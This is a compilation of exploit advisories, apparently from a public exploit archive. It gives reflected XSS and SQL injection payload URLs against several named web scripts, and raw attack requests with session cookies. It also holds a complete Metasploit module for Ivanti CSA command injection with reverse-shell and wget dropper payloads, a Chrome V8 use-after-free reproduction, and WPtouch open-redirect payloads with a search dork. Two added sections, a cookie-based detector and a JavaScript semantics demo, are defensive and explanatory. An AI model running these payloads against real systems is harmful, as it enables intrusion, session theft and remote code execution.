<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Multi-Vendor Shopping Cart 3.2.3 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker who sends the victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br />Method: GET<br /><br />URL parameter 'page' is vulnerable to XSS<br /><br />https://www.website.com/index.php?page=product%2fcouponsh446k%3cimg%20src%3da%20onerror%3dalert(1)%3eciqs8<br /><br /><br />URL parameter 'keyword' is vulnerable to XSS<br /><br />https://www.website.com/index.php?page=product/productviews&keyword=tv24708%22%3balert(1)%2f%2f279<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit<br />## Development: nu11secur1ty<br />## Date: 01.19.2023<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2<br /><br />## Description:<br />The value of manual insertion point 3 is copied into the HTML<br />document as plain text between tags.<br />The payload udz21<script>alert(1)</script>rk346 was submitted in<br />manual insertion point 3.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick an already logged-in user into visiting the<br />exploit link that the attacker has created,<br />and if this already logged-in user is not actually IT or an admin, this<br />will be the end of this system.<br /><br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br />```http<br />GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27 HTTP/1.1<br />Host: pwnedhost1.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1; SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/zd6e18)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/cross-site-scripting)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Ivanti Cloud Services Appliance (CSA) Command Injection',<br />        'Description' => %q{<br />          This module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA)<br />          for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the<br />          Cloud Services Appliance before `4.6.0-512` allows an unauthenticated user to<br />          execute arbitrary code with limited permissions. Successful exploitation results<br />          in command execution as the `nobody` user.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'Jakub Kramarz', # Discovery<br />          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor<br />        ],<br />        'References' => [<br />          ['CVE', '2021-44529'],<br />          ['URL', 'https://forums.ivanti.com/s/article/SA-2021-12-02'],<br />          ['URL', 'https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529'],<br />          ['EDB', '50833'],<br />          ['PACKETSTORM', '166383']<br />        ],<br />        'DisclosureDate' => '2021-12-02',<br />        'Platform' => ['unix', 'linux', 'php'],<br />        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_PHP],<br />        'Privileged' => false,<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http'<br />              }<br />            }<br />          ],<br />          [<br />            'PHP Command',<br />            {<br />              'Platform' => 'php',<br />              'Arch' => ARCH_PHP,<br />              'Type' => :php_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br />              }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_X64],<br />              'Type' => :linux_dropper,<br />              'CmdStagerFlavor' => ['wget', 'printf', 'echo'],<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'linux/x64/meterpreter_reverse_http'<br />              }<br />            }<br />          ]<br />        ],<br />        'Payload' => {<br />          'BadChars' => '"' # We use this to denote the payload as a string so having it in the payload would escape things.<br />        },<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'RPORT' => 443,<br />          'SSL' => true<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br />  end<br /><br />  # Randomize the cookie pairs for the request.<br />  def randomize_cookie(payload)<br />    # Number of cookie pairs should be at least 4, and the first cookie pair should<br />    # always have the value 'ab'. Note that the Nth cookie in the request, where<br />    # N=no_of_cookies-2, should contain the payload.<br />    #<br />    # example 1: Cookie: sG34st=ab;g3sBdnn=<PAYLOAD>;h4hYyeEe=;j7sJJjjs=;<br />    # example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=<PAYLOAD>;uEn44Nkk=;nnXk=;<br />    no_of_cookies = rand(4..8)<br />    cookie_name = Rex::Text.rand_text_alphanumeric(1..8)<br />    payload_cookie_number = (no_of_cookies - 2)<br />    random_cookie = "#{cookie_name}=ab;"<br />    for cookie_no in 2..no_of_cookies do<br />      cookie_name = Rex::Text.rand_text_alphanumeric(1..8)<br />      if cookie_no == payload_cookie_number<br />        random_cookie << "#{cookie_name}=#{payload};"<br />      else<br />        random_cookie << "#{cookie_name}=;"<br />      end<br />    end<br /><br />    return random_cookie<br />  end<br /><br />  def check_vuln<br />    # check RCE by grabbing CSA version banner stored on /etc/LDBUILD<br />    payload = Base64.strict_encode64('readfile("/etc/LDBUILD");')<br />    cookie_payload = randomize_cookie(payload)<br /><br />    return send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),<br />      'cookie' => cookie_payload.to_s<br />    })<br />  rescue StandardError => e<br />    elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br />    return nil<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    case target['Type']<br />    when :unix_cmd<br />      payload = Base64.strict_encode64("system(\"#{cmd}\");")<br />    when :php_cmd<br />      payload = Base64.strict_encode64(cmd.to_s)<br />    when :linux_dropper<br />      payload = Base64.strict_encode64("system(\"#{cmd}\");")<br />    end<br />    cookie_payload = randomize_cookie(payload)<br /><br />    return send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),<br />      'cookie' => cookie_payload.to_s<br />    })<br />  rescue StandardError => e<br />    elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br />    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br />  end<br /><br />  def check<br />    print_status("Checking if #{peer} can be exploited.")<br />    res = check_vuln<br />    return CheckCode::Unknown('No response received from the target.') unless res<br />    return CheckCode::Safe unless res.code == 200 && !res.body.blank? && res.body =~ /<c123>/<br /><br />    begin<br />      parsed_html = Nokogiri::HTML.parse(res.body)<br />    rescue Nokogiri::SyntaxError => e<br />      return CheckCode::Unknown("Unable to parse the HTTP response! Error: #{e}")<br />    end<br />    csa_version = parsed_html.at_css('c123')<br />    if csa_version&.text&.blank?<br />      CheckCode::Vulnerable('Could not retrieve version.')<br />    else<br />      CheckCode::Vulnerable("Version: #{csa_version.text}")<br />    end<br />  end<br /><br />  def exploit<br />    case target['Type']<br />    when :unix_cmd<br />      print_status("Executing #{target.name} with #{payload.encoded}")<br />      execute_command(payload.encoded)<br />    when :php_cmd<br />      print_status("Executing #{target.name} with #{payload.encoded}")<br />      execute_command(payload.encoded)<br />    when :linux_dropper<br />      print_status("Executing #{target.name}")<br />      execute_cmdstager(linemax: 262144)<br />    end<br />  end<br />end<br /></code></pre>
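From the detection side, the module's own comments in `randomize_cookie` describe the request shape it sends: at least four `name=value` cookie pairs, the first with the value `ab`, and the pair at position N-2 carrying a base64-encoded PHP snippet. The following added example (not part of the Metasploit module, and not Ivanti code) parses a `Cookie` header and flags that shape, with a looser fallback for any cookie value that decodes to PHP; the sample headers are constructed for the test, not captured traffic.

```javascript
// Added detection example (not from the Metasploit module): flag Cookie
// headers matching the CVE-2021-44529 request shape the module builds:
//   - at least four name=value pairs separated by ';'
//   - the first pair's value is exactly 'ab'
//   - the pair at position N-2 (1-based, so index length-3) carries a
//     base64 blob that decodes to PHP-looking source
// SAMPLE_HEADERS below are constructed for the test, not captured traffic.

function parseCookiePairs(header) {
  return header
    .split(';')
    .map((p) => p.trim())
    .filter((p) => p.length > 0)
    .map((p) => {
      const eq = p.indexOf('=');
      return eq < 0 ? { name: p, value: '' } : { name: p.slice(0, eq), value: p.slice(eq + 1) };
    });
}

// PHP calls the module itself uses (readfile, system) plus common siblings.
const PHP_HINTS = /\b(system|exec|passthru|shell_exec|readfile|eval)\s*\(/;

// Returns the decoded PHP snippet if `value` is base64 that decodes to it, else null.
function decodeIfPhp(value) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(value) || value.length % 4 !== 0) return null;
  const decoded = Buffer.from(value, 'base64').toString('utf8');
  return PHP_HINTS.test(decoded) ? decoded : null;
}

// Classify one Cookie header. Returns { suspicious, reason, payload }.
function inspectCookieHeader(header) {
  const pairs = parseCookiePairs(header);
  if (pairs.length >= 4 && pairs[0].value === 'ab') {
    const slot = pairs[pairs.length - 3]; // the module's payload position, N-2 (1-based)
    const php = decodeIfPhp(slot.value);
    if (php !== null) {
      return { suspicious: true, reason: 'CVE-2021-44529 cookie shape', payload: php };
    }
  }
  // Looser heuristic: any cookie value that is base64-encoded PHP.
  for (const p of pairs) {
    const php = decodeIfPhp(p.value);
    if (php !== null) return { suspicious: true, reason: 'base64 PHP in cookie value', payload: php };
  }
  return { suspicious: false, reason: 'no indicator', payload: null };
}

// Constructed samples: one mirroring the module's check request, one set of
// ordinary session cookies, and one with 'ab' first but harmless base64.
const SAMPLE_HEADERS = [
  'sG34st=ab;g3sBdnn=' + Buffer.from('readfile("/etc/LDBUILD");').toString('base64') + ';h4hYyeEe=;j7sJJjjs=;',
  'PHPSESSID=0123456789abcdef; lang=en; theme=dark; consent=1',
  'x=ab;y=;z=' + Buffer.from('hello world').toString('base64') + ';w=;v=;',
];

function scanHeaders(headers) {
  return headers.map((h) => inspectCookieHeader(h));
}
```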
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Jettweb.net │<br />│ Vendor : Jettweb │<br />│ Software : Jettweb Ready Rent A Car Script V4 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker who sends the victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />URL parameter 'id' is vulnerable to XSS<br /><br />Path: /rezervasyon.php<br /><br />https://example/rezervasyon.php?id=3mteyx%22%3e%3cscript%3ealert(1)%3c%2fscript%3esih3w<br /><br />[-] Done<br /></code></pre>
<pre><code>Chrome: Copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess<br /><br />VULNERABILITY DETAILS<br />Copy-on-write is one of V8's internal optimization features that allows multiple JavaScript objects to share the same element store. This feature is primarily used to optimize creation of JavaScript arrays from literals. It's important that every function that can add a new element to a JS object or modify an existing one first checks that the element store isn't marked as COW and makes a copy of the store if needed. Otherwise, the element will be unexpectedly changed for every object that uses the same store.<br /><br />Consider the implementation of the safety check in `JSNativeContextSpecialization::BuildElementAccess`:<br /><br />```cpp<br />JSNativeContextSpecialization::ValueEffectControl<br />JSNativeContextSpecialization::BuildElementAccess(<br />    Node* receiver, Node* index, Node* value, Node* effect, Node* control,<br />    Node* context, ElementAccessInfo const& access_info,<br />    KeyedAccessMode const& keyed_mode) {<br />[...]<br />  if (keyed_mode.access_mode() == AccessMode::kStore &&<br />      IsSmiOrObjectElementsKind(elements_kind) &&<br />      !IsCOWHandlingStoreMode(keyed_mode.store_mode())) {<br />    effect = graph()->NewNode(<br />        simplified()->CheckMaps(<br />            CheckMapsFlag::kNone,<br />            ZoneHandleSet<Map>(factory()->fixed_array_map())),<br />        elements, effect, control);<br />  }<br />[...]<br />}<br />```<br /><br />The `CheckMaps` node is only inserted if the current access mode is `kStore`. However, there are other modes that can also result in storing an element, and one of them is `kDefine`. A call to the `Object.defineProperty` function won't lead to an access in this mode, but an attacker can take advantage of class field initialization to trigger it:<br /><br />```javascript<br />function ReturnHolder() { return define_property_holder }<br />class Trigger extends ReturnHolder { 123 = new_value; }<br />```<br /><br />The `Trigger` constructor will perform an element access that's equivalent to the expression `define_property_holder[123] = new_value`, but will set the access mode to `kDefine`, thus bypassing the safety check.<br /><br />There are likely multiple ways to exploit the issue. The approach the attached reproduction case takes is to create two `PACKED_SMI_ELEMENTS` arrays that share the element store and then get one of the arrays to transition to the `PACKED_ELEMENTS` kind and store a `HeapObject` element. Since copying elements from the corrupted Smi array to another Smi array won't trigger any write barriers, we can hide the pointer from the garbage collector in a new array and trigger a use-after-free on a V8 heap address.<br /><br /><br />VERSION<br />V8 version 10.9.0 (candidate)<br />Google Chrome 107.0.5304.87 (Official Build) (64-bit)<br /><br /><br />REPRODUCTION CASE<br />```javascript<br />function ForceGC() { try { new ArrayBuffer(2 ** 34); } catch {} }<br /><br />old_space_array = Array(1, 2);<br /><br />function CopyElement(from, to) { to[0] = from[0]; } // no write barrier for smi arrays<br />for (let i = 0; i < 10000; ++i) {<br />  CopyElement(old_space_array, old_space_array);<br />}<br /><br />ForceGC();<br /><br />function MakeCOW() { return [0]; }<br />original_cow_object = MakeCOW();<br /><br />function MakeCopy() {<br />  let copy = original_cow_object.concat(); // create a new object with COW elements<br />  copy.splice(); // copy the elements<br />  return copy;<br />}<br /><br />new_value = 1;<br />new_value = {}; // mark the cell as mutable<br /><br />function ReturnHolder() { return define_property_holder }<br />class Trigger extends ReturnHolder { 0 = new_value; }<br /><br />for (let i = 0; i < 10000; ++i) {<br />  define_property_holder = MakeCopy();<br />  new Trigger();<br />}<br /><br />new_value = {};<br />define_property_holder = MakeCOW();<br />new Trigger();<br /><br />new_space_array = MakeCOW();<br />new_space_array.splice();<br /><br />CopyElement(new_space_array, old_space_array);<br /><br />new_value = "";<br />define_property_holder = MakeCOW();<br />new Trigger();<br /><br />new_space_array = null;<br />ForceGC();<br /><br />console.log(old_space_array[0][0]);<br />```<br /><br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-06.<br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
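To make the `kStore` versus `kDefine` distinction concrete without touching V8 internals, here is an added example (not from the Project Zero report) showing why a class field initializer is a different operation from an assignment: the language specifies it as [[DefineOwnProperty]] on the receiver returned by the parent constructor, so it bypasses a setter on the prototype chain that a plain `obj[123] = v` store would invoke. The helper names `makeHolder`, `storeViaAssignment`, `storeViaClassField` and `compare` are this example's own.

```javascript
// Added example: contrasts a plain element store (what the compiler sees as
// AccessMode::kStore) with a class field initializer (AccessMode::kDefine).
// The helper names are constructed for this illustration; they are not from
// V8 or from the report above.

// A holder whose prototype intercepts writes to index 123 with a setter.
// Under [[Set]] semantics the setter runs; under [[DefineOwnProperty]]
// semantics it is bypassed and an own data property is created instead.
function makeHolder(log) {
  const proto = {};
  Object.defineProperty(proto, '123', {
    set(v) { log.push(`setter saw ${String(v)}`); },
    configurable: true,
  });
  return Object.create(proto);
}

// Plain assignment: ordinary [[Set]], the shape of a kStore element access.
function storeViaAssignment(holder, value) {
  holder[123] = value;
  return Object.prototype.hasOwnProperty.call(holder, '123');
}

// Class field initializer: the spec performs CreateDataPropertyOrThrow on the
// receiver that the parent constructor returned, i.e. [[DefineOwnProperty]].
// This mirrors the report's `class Trigger extends ReturnHolder { 123 = new_value; }`.
function storeViaClassField(holder, value) {
  function ReturnHolder() { return holder; } // parent ctor returns the holder
  class Trigger extends ReturnHolder { 123 = value; }
  new Trigger();
  return Object.prototype.hasOwnProperty.call(holder, '123');
}

// Run both paths on fresh holders and report what each one did.
function compare() {
  const logA = [];
  const a = makeHolder(logA);
  const ownA = storeViaAssignment(a, 'x');

  const logB = [];
  const b = makeHolder(logB);
  const ownB = storeViaClassField(b, 'y');

  return {
    assignmentCreatedOwn: ownA, assignmentLog: logA, assignmentValue: a[123],
    defineCreatedOwn: ownB, defineLog: logB, defineValue: b[123],
  };
}
```

The same difference in semantics is why the JIT models the field initializer as a separate access mode, and why a check keyed only on `kStore` does not cover it.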
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Activeitzone.com │<br />│ Vendor : ActiveITzone │<br />│ Software : Active eCommerce CMS 6.5.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data, and can crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /ecommerce/search<br /><br />GET parameter 'keyword' is vulnerable to SQLI<br /><br />https://www.website.com/ecommerce/search?selected_attribute_values%5B%5D=M&selected_attribute_values%5B%5D=Chenille&color=%23CD5C5C&keyword=G502[INJECT-HERE]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Jettweb.net │<br />│ Vendor : Jettweb │<br />│ Software : PHP Hazır Haber Sitesi Scripti V3 - PHP Instant News Site (HaberScript03) │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data, and can crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /fonksiyonlar.php<br /><br />POST parameter 'haberid' is vulnerable to SQLI<br /><br />https://www.website.com/fonksiyonlar.php?fgit=yorumlar&haberid=95[SQL-Inject-HERE]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: zstore-6.5.4 - XSS-Reflected<br />## Development: nu11secur1ty<br />## Date: 01.18.2023<br />## Vendor: https://zippy.com.ua/<br />## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4<br />## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4<br /><br />## Description:<br />The value of manual insertion point 1 is copied into the HTML document<br />as plain text between tags.<br />The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in<br />manual insertion point 1.<br />This input was echoed unmodified in the application's response.<br /><br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br />```http<br />GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2<br />Host: store.zippy.com.ua<br />Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />```<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tplz84)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/cross-site-scripting/reflected)<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch 3.7.5 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |<br />| # Vendor : https://wordpress.org/plugins/wptouch/ |<br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing.<br /> However, when connected to a mobile device, the plugin allows you to switch the display between a desktop and a mobile device.<br /> Desktop browsing does not allow you to switch,<br /> but if we use the payload then it is possible.<br /> <br /> This URL redirection vulnerability allows remote<br /> attackers to redirect users to arbitrary websites and conduct phishing attacks.<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload : ?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br />[+] https://127.0.0.1/incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm * thelastvvv * Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch 4.3.47 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |<br />| # Vendor : https://wordpress.org/plugins/wptouch/ |<br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing.<br /> However, when connected to a mobile device, the plugin allows you to switch the display between a desktop and a mobile device.<br /> Desktop browsing does not allow you to switch,<br /> but if we use the payload then it is possible.<br /> <br /> This URL redirection vulnerability allows remote<br /> attackers to redirect users to arbitrary websites and conduct phishing attacks.<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload : ?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br />[+] https://127.0.0.1/incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * shadow_00715 * LiquidWorm * thelastvvv * 